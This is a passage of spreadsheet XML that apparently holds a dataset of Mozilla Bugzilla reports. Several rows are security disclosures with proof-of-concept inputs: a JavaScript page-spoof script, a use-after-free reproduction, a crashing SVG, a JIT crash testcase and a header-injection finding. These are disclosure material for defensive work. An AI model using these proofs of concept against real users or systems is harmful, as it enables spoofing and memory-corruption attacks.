          <t>mozilla9</t>
        </is>
      </c>
      <c r="T1075" t="n">
        <v>1</v>
      </c>
      <c r="U1075" t="n">
        <v>0</v>
      </c>
      <c r="V1075" t="n">
        <v>16</v>
      </c>
      <c r="W1075" t="inlineStr">
        <is>
          <t>The following test crashes on mozilla-central revision d078623f7875 (options -m -n -a), tested on 64 bit:
function testKeyTransitions() {
  var i, key, result, message;
  var array = [];
  for (i = 0; i != 10; i++) {
    key = (i &lt; 3) ? 'pop' : (/\u009e\u0029/g );
    array[key](i);
  }
}
testKeyTransitions();
Looks like a null-pointer deref, but s-s to be sure:
==39098== Invalid read of size 8
==39098==    at 0x4423CC: JSC::MacroAssemblerCodePtr::executableAddress() const (MacroAssemblerCodeRef.h:150)
==39098==    by 0x76FAF1: JSC::RepatchBuffer::RepatchBuffer(JSC::MacroAssemblerCodeRef const&amp;) (RepatchBuffer.h:54)
==39098==    by 0x76FBD6: js::mjit::ic::Repatcher::Repatcher(js::mjit::JITScript*) (ICRepatcher.h:64)
==39098==    by 0x77806C: js::mjit::ic::BaseIC::disable(JSContext*, char const*, void*) (PolyIC.cpp:2233)
==39098==    by 0x77830A: js::mjit::ic::GetElementIC::disable(JSContext*, char const*) (PolyIC.cpp:2290)
==39098==    by 0x77AF86: js::mjit::ic::GetElementIC::update(js::VMFrame&amp;, JSContext*, JSObject*, js::Value const&amp;, jsid, js::Value*) (PolyIC.cpp:2757)
==39098==    by 0x77B131: js::mjit::ic::CallElement(js::VMFrame&amp;, js::mjit::ic::GetElementIC*) (PolyIC.cpp:2788)
==39098==    by 0x6DF341: ??? (MethodJIT.cpp:153)
==39098==    by 0x6DF5DB: js::mjit::EnterMethodJIT(JSContext*, js::StackFrame*, void*, js::Value*, bool) (MethodJIT.cpp:884)
==39098==    by 0x6DF800: CheckStackAndEnterMethodJIT(JSContext*, js::StackFrame*, void*, bool) (MethodJIT.cpp:945)
==39098==    by 0x6DF950: js::mjit::JaegerShotAtSafePoint(JSContext*, void*, bool) (MethodJIT.cpp:972)
==39098==    by 0x502554: js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) (jsinterp.cpp:2206)
==39098==  Address 0x0 is not stack'd, malloc'd or (recently) free'd</t>
        </is>
      </c>
      <c r="X1075" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1076">
      <c r="A1076" t="n">
        <v>1378035</v>
      </c>
      <c r="B1076" t="inlineStr">
        <is>
          <t>2017-07-03 21:10:29 -0700</t>
        </is>
      </c>
      <c r="C1076" t="inlineStr">
        <is>
          <t>Allow the urlbar prefs to define different buckets for different contexts</t>
        </is>
      </c>
      <c r="D1076" t="inlineStr">
        <is>
          <t>2017-07-24 17:58:54 -0700</t>
        </is>
      </c>
      <c r="E1076" t="n">
        <v>1</v>
      </c>
      <c r="F1076" t="n">
        <v>1</v>
      </c>
      <c r="G1076" t="n">
        <v>2</v>
      </c>
      <c r="H1076" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1076" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1076" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K1076" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1076" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1076" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1076" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1076" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1076" t="inlineStr">
        <is>
          <t>[fxsearch]</t>
        </is>
      </c>
      <c r="Q1076" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1076" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1076" t="inlineStr">
        <is>
          <t>Firefox 56</t>
        </is>
      </c>
      <c r="T1076" t="n">
        <v>1</v>
      </c>
      <c r="U1076" t="n">
        <v>0</v>
      </c>
      <c r="V1076" t="n">
        <v>10</v>
      </c>
      <c r="W1076" t="inlineStr">
        <is>
          <t>We currently show local results first and remote results second, as distinct groups. This means that if the user is doing an information search, the best result we have to offer is buried deep down in position 7, most of the time. Conversely, with bug 1359899 remote results would be on top and if the user is doing a navigational or recovery search our best result would likely be again in position 7.
In order to make sure our best results for every kind of query (informational, navigational, recovery) are visible, we should surface the best of both kinds to the top of the results panel. This change is about enabling experiments, so it should be controlled by a pref.</t>
        </is>
      </c>
      <c r="X1076" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1077">
      <c r="A1077" t="n">
        <v>725611</v>
      </c>
      <c r="B1077" t="inlineStr">
        <is>
          <t>2012-02-09 03:59:30 -0800</t>
        </is>
      </c>
      <c r="C1077" t="inlineStr">
        <is>
          <t>[CAL-2012-0019]Firefox website spoof vulnerability by hook event</t>
        </is>
      </c>
      <c r="D1077" t="inlineStr">
        <is>
          <t>2012-09-13 15:18:29 -0700</t>
        </is>
      </c>
      <c r="E1077" t="n">
        <v>1</v>
      </c>
      <c r="F1077" t="n">
        <v>1</v>
      </c>
      <c r="G1077" t="n">
        <v>2</v>
      </c>
      <c r="H1077" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1077" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1077" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K1077" t="inlineStr">
        <is>
          <t>10 Branch</t>
        </is>
      </c>
      <c r="L1077" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1077" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1077" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1077" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1077" t="inlineStr">
        <is>
          <t xml:space="preserve">[sg:moderate][advisory-tracking+] fixed by bug 724599 </t>
        </is>
      </c>
      <c r="Q1077" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1077" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1077" t="inlineStr">
        <is>
          <t>Firefox 14</t>
        </is>
      </c>
      <c r="T1077" t="n">
        <v>1</v>
      </c>
      <c r="U1077" t="n">
        <v>0</v>
      </c>
      <c r="V1077" t="n">
        <v>18</v>
      </c>
      <c r="W1077" t="inlineStr">
        <is>
          <t>Created attachment 595702
screen.gif
User Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0
Build ID: 20120129021758
Steps to reproduce:
[CAL-2012-0019]Firefox website spoof vulnerability by hook event
1 Affected Products
=================
tested Firefox 10.0(last)
2 Vulnerability Details
=====================
Code Audit Labs of Vulnhunt.com(http://www.vulnhunt.com) has discovered a website spoof vulnerability in firefox which may Trick victims trust attack content as truested websit content like google in example.
3 POC:
====
open a html with following content
===================================
&lt;h1 id="msg"&gt;type www.google.com in address bar for CAL-2012-0019 by Code Audit Labs of Vulnhunt.com&lt;/h1&gt;
&lt;h1 id="spoof"&gt;&lt;input id="log"&gt;&lt;/h1&gt;
&lt;script type="text/javascript"&gt;
spoof.style.display = 'none';
var done = 0;
var got = 0;
onbeforeunload = function(ev) {
  done = 1;
  alert('Move your mouse now \nclick "Leave Page" with keyboard')
  return false;
}
onmousemove = function() {
  stop();
  //console.log(done)
  if (done &amp;&amp; !got) {
    msg.style.display = 'none';
    got = prompt('enter your key?');
    if (got) {
      spoof.style.display = 'block';
      log.value = got;
    }
  }
}
&lt;/script&gt;
===================================
4 About Code Audit Labs:
=====================
Code Audit Labs secure your software,provide Professional include source
code audit and binary code audit service.
Code Audit Labs:" You create value for customer,We protect your value"
http://www.VulnHunt.com
http://blog.vulnhunt.com
http://t.qq.com/vulnhunt
http://weibo.com/vulnhunt
Actual results:
spoof
Expected results:
not spoof</t>
        </is>
      </c>
      <c r="X1077" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1078">
      <c r="A1078" t="n">
        <v>1392622</v>
      </c>
      <c r="B1078" t="inlineStr">
        <is>
          <t>2017-08-22 07:01:23 -0700</t>
        </is>
      </c>
      <c r="C1078" t="inlineStr">
        <is>
          <t>[RTL] Favicons are overlaying title on latest nighty</t>
        </is>
      </c>
      <c r="D1078" t="inlineStr">
        <is>
          <t>2017-09-06 03:09:56 -0700</t>
        </is>
      </c>
      <c r="E1078" t="n">
        <v>1</v>
      </c>
      <c r="F1078" t="n">
        <v>1</v>
      </c>
      <c r="G1078" t="n">
        <v>2</v>
      </c>
      <c r="H1078" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1078" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1078" t="inlineStr">
        <is>
          <t>Tabbed Browser</t>
        </is>
      </c>
      <c r="K1078" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1078" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1078" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1078" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1078" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1078" t="inlineStr">
        <is>
          <t>[reserve-photon-animation]</t>
        </is>
      </c>
      <c r="Q1078" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1078" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1078" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T1078" t="n">
        <v>1</v>
      </c>
      <c r="U1078" t="n">
        <v>0</v>
      </c>
      <c r="V1078" t="n">
        <v>25</v>
      </c>
      <c r="W1078" t="inlineStr">
        <is>
          <t>Created attachment 8899836
favicon.png
What's wrong:
With today's nightly, tabs are making space on the wrong direction while the favicons overlay the title (check the attachment).
How should it be?
On an RTL locale, the tab should have a padding on right (instead of left) so the favicons do not overlay the title.</t>
        </is>
      </c>
      <c r="X1078" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1079">
      <c r="A1079" t="n">
        <v>540100</v>
      </c>
      <c r="B1079" t="inlineStr">
        <is>
          <t>2010-01-15 16:38:30 -0800</t>
        </is>
      </c>
      <c r="C1079" t="inlineStr">
        <is>
          <t>nsTreeSelection EventListener Use-after-free Remote Code Execution Vulnerability (ZDI-CAN-669)</t>
        </is>
      </c>
      <c r="D1079" t="inlineStr">
        <is>
          <t>2017-05-09 11:27:27 -0700</t>
        </is>
      </c>
      <c r="E1079" t="n">
        <v>1</v>
      </c>
      <c r="F1079" t="n">
        <v>1</v>
      </c>
      <c r="G1079" t="n">
        <v>3</v>
      </c>
      <c r="H1079" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1079" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1079" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K1079" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L1079" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1079" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1079" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1079" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1079" t="inlineStr">
        <is>
          <t>[sg:dupe 375928] fixed by bug 375928</t>
        </is>
      </c>
      <c r="Q1079" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1079" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1079" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1079" t="n">
        <v>1</v>
      </c>
      <c r="U1079" t="n">
        <v>0</v>
      </c>
      <c r="V1079" t="n">
        <v>7</v>
      </c>
      <c r="W1079" t="inlineStr">
        <is>
          <t>Created attachment 421958
Proof of concept
ZDI-CAN-669: Mozilla Firefox nsTreeSelection EventListener Use-after-free Remote Code Execution Vulnerability
-- ABSTRACT ------------------------------------------------------------
TippingPoint has identified a vulnerability affecting the following  products:
    Mozilla Firefox 3.5.x
-- VULNERABILITY DETAILS -----------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on software utilizing a vulnerable version of Mozilla's Firefox. User interaction is required in that the victim must visit a malicious website or be coerced into opening a malicious document. 
The specific flaw exists within how the application handles particular events for an nsTreeSelection element. Upon execution of a "select" event the application will access an element without checking to see if it's been previously freed or not. Successful exploitation can lead to code execution under the context of the application.
This vulnerability occurs due to firing an event on an object that has already been freed and can be reproduced with the following code: 
&lt;tree id="tr" flex="1"&gt;
    &lt;treechildren&gt;
        &lt;treeitem&gt;
            &lt;treerow&gt;
                &lt;treecell/&gt;
            &lt;/treerow&gt;
        &lt;/treeitem&gt;
    &lt;/treechildren&gt;
&lt;/tree&gt;
tree = document.getElementById('tr');
tree.addEventListener("select", function (e) {}, false);
tree.view.selection.timedSelect(0, 5000);    // XXX: fire "select" event
in 5 seconds
tree.view.selection = null;                  // XXX: freed
Upon calling timedSelect on a tree.view.selection object, the application will instantiate a new timer, and call SelectCallback when it fires.
layout/xul/base/src/tree/src/nsTreeSelection.cpp:336
NS_IMETHODIMP nsTreeSelection::TimedSelect(PRInt32 aIndex, PRInt32
aMsec)
{
  PRBool suppressSelect = mSuppressed;
  if (aMsec != -1)
    mSuppressed = PR_TRUE;
  nsresult rv = Select(aIndex);
  if (NS_FAILED(rv))
    return rv;
  if (aMsec != -1) {
    mSuppressed = suppressSelect;
    if (!mSuppressed) {
      if (mSelectTimer)
        mSelectTimer-&gt;Cancel();
      mSelectTimer = do_CreateInstance("@mozilla.org/timer;1");
      mSelectTimer-&gt;InitWithFuncCallback(SelectCallback, this, aMsec,  
// XXX
                                         nsITimer::TYPE_ONE_SHOT);
    }
  }
  return NS_OK;
}
At this point, a malicious individual will want to free the tree.view.selection the timer has been created for. Once the timer fires, the callback will then be executed. The following code will load the closure representing the callback, and then execute it.
layout/xul/base/src/tree/src/nsTreeSelection.cpp:847
void
nsTreeSelection::SelectCallback(nsITimer *aTimer, void *aClosure)
{
  nsTreeSelection* self = static_cast&lt;nsTreeSelection*&gt;(aClosure);
  if (self) {
    self-&gt;FireOnSelectHandler();        // XXX
    aTimer-&gt;Cancel();
    self-&gt;mSelectTimer = nsnull;
  }
}
The select handler that's been fired, will load the code for the event and then execute it. At this point the tree.view.selection object has been freed.
layout/xul/base/src/tree/src/nsTreeSelection.cpp:827
nsresult
nsTreeSelection::FireOnSelectHandler()
{
  if (mSuppressed || !mTree)
    return NS_OK;
  nsCOMPtr&lt;nsIBoxObject&gt; boxObject = do_QueryInterface(mTree);
  NS_ASSERTION(boxObject, "no box object!");
  if (!boxObject)
     return NS_ERROR_UNEXPECTED;
  nsCOMPtr&lt;nsIDOMElement&gt; elt;
  boxObject-&gt;GetElement(getter_AddRefs(elt));
  NS_ENSURE_STATE(elt);
  nsRefPtr&lt;nsPLDOMEvent&gt; event =
    new nsPLDOMEvent(elt, NS_LITERAL_STRING("select"));
  event-&gt;RunDOMEventWhenSafe();     // XXX
  return NS_OK;
}
Version(s)  tested: FireFox 3.6.5 
Platform(s) tested: Windows XP SP3
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht
-- FURTHER DETAILS -----------------------------------------------------
If you have any questions, comments, concerns or require additional details please feel free to contact me via the following:
    Kate Fly
    Security Liaison
    TippingPoint
    kfly@tippingpoint.com
    Office: +1 512.681.8219
We can alternatively be reached via e-mail at:
    zdi-disclosures@tippingpoint.com
Our PGP key is available from:
    http://www.zerodayinitiative.com/documents/disclosures-pgp-key.asc</t>
        </is>
      </c>
      <c r="X1079" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1080">
      <c r="A1080" t="n">
        <v>360645</v>
      </c>
      <c r="B1080" t="inlineStr">
        <is>
          <t>2006-11-14 00:22:58 -0800</t>
        </is>
      </c>
      <c r="C1080" t="inlineStr">
        <is>
          <t>Firefox 2.0 SVG "_cairo_pen_init" Heap Overflow</t>
        </is>
      </c>
      <c r="D1080" t="inlineStr">
        <is>
          <t>2007-03-26 17:14:43 -0700</t>
        </is>
      </c>
      <c r="E1080" t="n">
        <v>1</v>
      </c>
      <c r="F1080" t="n">
        <v>1</v>
      </c>
      <c r="G1080" t="n">
        <v>3</v>
      </c>
      <c r="H1080" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1080" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1080" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K1080" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L1080" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1080" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1080" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1080" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1080" t="inlineStr">
        <is>
          <t>[sg:critical?] 1.8.1(x)-only</t>
        </is>
      </c>
      <c r="Q1080" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1080" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1080" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1080" t="n">
        <v>1</v>
      </c>
      <c r="U1080" t="n">
        <v>0</v>
      </c>
      <c r="V1080" t="n">
        <v>18</v>
      </c>
      <c r="W1080" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.9a1) Gecko/20061113 Minefield/3.0a1
Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.9a1) Gecko/20061113 Minefield/3.0a1
Firefox 2.0 SVG "_cairo_pen_init" Heap Overflow
Versions Affected:
Firefox 2.0
Platforms Affected:
Apple Mac OSX 10.4 and prior
Windows XP
Linux
Overview:
When processing a specially crafted .svg file, this will cause firefox to crash.  This allows for an attacker to cause firefox to crash, and or to execute arbitrary code (probably a tough one) on a targeted host.
Technical Details:
The following SVG code below will reproduce this issue:
		&lt;clipPath  stroke-width="2000000000000000" color="1" &gt;
			&lt;line&gt;
			&lt;/line&gt;
		&lt;/clipPath&gt;
Below is the crash when running firefox within gdb on OSX 10.4.7
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x45b4f010
0x007d62c5 in _cairo_pen_init ()
(gdb) bt
#0  0x007d62c5 in _cairo_pen_init ()
#1  0x00712635 in _cairo_gstate_stroke_extents ()
#2  0x0050e219 in cairo_stroke_extents ()
#3  0x004f30b0 in nsSVGCairoPathGeometry::GetCoveredRegion ()
#4  0x004f324d in nsSVGCairoPathGeometry::Update ()
#5  0x007ae1bc in nsSVGPathGeometryFrame::UpdateGraphic ()
#6  0x007ae3f2 in nsSVGPathGeometryFrame::NotifyRedrawUnsuspended ()
#7  0x006529ab in nsSVGDefsFrame::NotifyRedrawUnsuspended ()
#8  0x0069abee in nsSVGOuterSVGFrame::UnsuspendRedraw ()
#9  0x0069b121 in nsSVGOuterSVGFrame::DidReflow ()
#10 0x0063f84f in CanvasFrame::Reflow ()
#11 0x0044a58c in nsContainerFrame::ReflowChild ()
#12 0x00680234 in nsHTMLScrollFrame::ReflowScrolledFrame ()
#13 0x0068040a in nsHTMLScrollFrame::ReflowContents ()
#14 0x006820fe in nsHTMLScrollFrame::Reflow ()
-- snip --
Reproducible: Always</t>
        </is>
      </c>
      <c r="X1080" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1081">
      <c r="A1081" t="n">
        <v>621572</v>
      </c>
      <c r="B1081" t="inlineStr">
        <is>
          <t>2010-12-27 12:02:30 -0800</t>
        </is>
      </c>
      <c r="C1081" t="inlineStr">
        <is>
          <t>[SECURITY] chart.cgi vulnerable to header-injection due to use of |print "Location:"| instead of $cgi-&gt;redirect</t>
        </is>
      </c>
      <c r="D1081" t="inlineStr">
        <is>
          <t>2011-08-28 05:28:20 -0700</t>
        </is>
      </c>
      <c r="E1081" t="n">
        <v>1</v>
      </c>
      <c r="F1081" t="n">
        <v>1</v>
      </c>
      <c r="G1081" t="n">
        <v>4</v>
      </c>
      <c r="H1081" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1081" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1081" t="inlineStr">
        <is>
          <t>Reporting/Charting</t>
        </is>
      </c>
      <c r="K1081" t="inlineStr">
        <is>
          <t>4.1</t>
        </is>
      </c>
      <c r="L1081" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1081" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1081" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1081" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1081" t="inlineStr">
        <is>
          <t>[infrasec:xss][ws:critical]</t>
        </is>
      </c>
      <c r="Q1081" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1081" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1081" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T1081" t="n">
        <v>1</v>
      </c>
      <c r="U1081" t="n">
        <v>0</v>
      </c>
      <c r="V1081" t="n">
        <v>10</v>
      </c>
      <c r="W1081" t="inlineStr">
        <is>
          <t>Found in chart.cgi:
    print "Location: query.cgi?format=" . $cgi-&gt;param('query_format') .
                                          ($params ? "&amp;$params" : "") . "\n\n";
    print "Location: buglist.cgi" . ($params ? "?$params" : "") . "\n\n";
We should use $cgi-&gt;redirect instead.</t>
        </is>
      </c>
      <c r="X1081" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1082">
      <c r="A1082" t="n">
        <v>1318414</v>
      </c>
      <c r="B1082" t="inlineStr">
        <is>
          <t>2016-11-17 10:38:11 -0800</t>
        </is>
      </c>
      <c r="C1082" t="inlineStr">
        <is>
          <t>Default to empty strings for titles and parent titles if not set</t>
        </is>
      </c>
      <c r="D1082" t="inlineStr">
        <is>
          <t>2016-12-14 08:11:55 -0800</t>
        </is>
      </c>
      <c r="E1082" t="n">
        <v>1</v>
      </c>
      <c r="F1082" t="n">
        <v>1</v>
      </c>
      <c r="G1082" t="n">
        <v>2</v>
      </c>
      <c r="H1082" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1082" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1082" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K1082" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1082" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1082" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1082" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1082" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1082" t="inlineStr"/>
      <c r="Q1082" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1082" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1082" t="inlineStr">
        <is>
          <t>Firefox 53</t>
        </is>
      </c>
      <c r="T1082" t="n">
        <v>1</v>
      </c>
      <c r="U1082" t="n">
        <v>0</v>
      </c>
      <c r="V1082" t="n">
        <v>18</v>
      </c>
      <c r="W1082" t="inlineStr">
        <is>
          <t>From IRC:
10:20 &lt;•rnewman&gt; kitcambridge, markh, tcsc: also, did we recently stop uploading parentName for the roots?
10:21 because all records are supposed to have a parentName, and iOS is refusing them…
10:22 &lt;•rnewman&gt; my guess is that a Places item has an undefined parentTitle, so when we JSON-serialize our record, that field is omitted.
10:25 &lt;•rnewman&gt; should be the empty string if the parent is the places root</t>
        </is>
      </c>
      <c r="X1082" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1083">
      <c r="A1083" t="n">
        <v>1792643</v>
      </c>
      <c r="B1083" t="inlineStr">
        <is>
          <t>2022-09-27 23:08:24 -0700</t>
        </is>
      </c>
      <c r="C1083" t="inlineStr">
        <is>
          <t>iframe contents can be arbitrarily drawn outside of iframe.</t>
        </is>
      </c>
      <c r="D1083" t="inlineStr">
        <is>
          <t>2024-05-30 11:01:00 -0700</t>
        </is>
      </c>
      <c r="E1083" t="n">
        <v>1</v>
      </c>
      <c r="F1083" t="n">
        <v>1</v>
      </c>
      <c r="G1083" t="n">
        <v>3</v>
      </c>
      <c r="H1083" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1083" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1083" t="inlineStr">
        <is>
          <t>Web Painting</t>
        </is>
      </c>
      <c r="K1083" t="inlineStr">
        <is>
          <t>Firefox 105</t>
        </is>
      </c>
      <c r="L1083" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M1083" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1083" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1083" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1083" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main107+][adv-esr102.5+]</t>
        </is>
      </c>
      <c r="Q1083" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1083" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1083" t="inlineStr">
        <is>
          <t>107 Branch</t>
        </is>
      </c>
      <c r="T1083" t="n">
        <v>1</v>
      </c>
      <c r="U1083" t="n">
        <v>0</v>
      </c>
      <c r="V1083" t="n">
        <v>16</v>
      </c>
      <c r="W1083" t="inlineStr">
        <is>
          <t>Created attachment 9296431
main.html
Steps to reproduce:
  1. Download 'main.html' and 'iframe.html' in the same directory.
  2. open 'main.html' on Firefox 105.
Actual results:
The content in the iframe is arbitrarily drawn outside of the iframe.
Expected results:
The content in the iframe should not be drawn outside of the iframe.
Severity:
This is vulnerable because the iframe domain (i.e., attacker) can fully cover the page of the main frame (i.e., victim) with any images using CSS margin-left, margin-top, and background-image (or background).
Environment:
Version: Firefox 105.0b5
OS: ubuntu 20.04
How was this issue discovered?
I used my fuzzer to find this issue.</t>
        </is>
      </c>
      <c r="X1083" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1084">
      <c r="A1084" t="n">
        <v>798867</v>
      </c>
      <c r="B1084" t="inlineStr">
        <is>
          <t>2012-10-07 00:14:21 -0700</t>
        </is>
      </c>
      <c r="C1084" t="inlineStr">
        <is>
          <t>Out-of-bounds read in ClusterIterator::NextCluster</t>
        </is>
      </c>
      <c r="D1084" t="inlineStr">
        <is>
          <t>2014-11-19 19:35:59 -0800</t>
        </is>
      </c>
      <c r="E1084" t="n">
        <v>1</v>
      </c>
      <c r="F1084" t="n">
        <v>1</v>
      </c>
      <c r="G1084" t="n">
        <v>3</v>
      </c>
      <c r="H1084" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1084" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1084" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K1084" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1084" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1084" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1084" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1084" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1084" t="inlineStr">
        <is>
          <t>[adv-main19+]</t>
        </is>
      </c>
      <c r="Q1084" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1084" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1084" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T1084" t="n">
        <v>1</v>
      </c>
      <c r="U1084" t="n">
        <v>0</v>
      </c>
      <c r="V1084" t="n">
        <v>16</v>
      </c>
      <c r="W1084" t="inlineStr">
        <is>
          <t>Created attachment 668884
Testcase
Reproduces on trunk by double-clicking anywhere in the content window.
=================================================================
==11059== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f0f8a78828b at pc 0x7f0fb1376d36 bp 0x7fffe7937850 sp 0x7fffe7937848
READ of size 1 at 0x7f0f8a78828b thread T0
    #0 0x7f0fb1376d35 in ClusterIterator::NextCluster() layout/generic/nsTextFrameThebes.cpp:6659
